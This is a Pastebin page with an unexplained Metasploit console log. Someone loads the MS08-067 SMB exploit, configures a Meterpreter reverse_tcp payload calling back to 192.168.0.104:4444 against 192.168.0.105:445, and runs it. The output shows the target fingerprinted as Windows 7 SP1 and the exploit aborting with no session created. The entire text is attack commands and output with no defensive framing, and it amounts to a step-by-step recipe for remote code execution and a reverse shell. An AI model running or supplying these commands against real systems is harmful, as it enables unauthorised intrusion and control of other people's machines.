Advertisement
Guest User

Untitled

a guest
Jun 30th, 2016
118
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.86 KB | None | 0 0
  1. msf > use windows/smb/ms08_067_netapi
  2. msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
  3. payload => windows/meterpreter/reverse_tcp
  4.  
  5. msf exploit(ms08_067_netapi) > set lhost 192.168.0.104
  6. lhost => 192.168.0.104
  7.  
  8. msf exploit(ms08_067_netapi) > set rhost 192.168.0.105
  9. rhost => 192.168.0.105
  10.  
  11. msf exploit(ms08_067_netapi) > set lport 4444
  12. lport => 4444
  13.  
  14. msf exploit(ms08_067_netapi) > set rport 445
  15. rport => 445
  16.  
  17. msf exploit(ms08_067_netapi) > exploit
  18.  
  19. [*] Started reverse TCP handler on 192.168.0.104:4444
  20. [*] Automatically detecting the target...
  21. [*] Fingerprint: Windows 7 - Service Pack 1 - lang:Unknown
  22. [*] We could not detect the language pack, defaulting to English
  23. [-] Exploit aborted due to failure: no-target: No matching target
  24. [*] Exploit completed, but no session was created.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement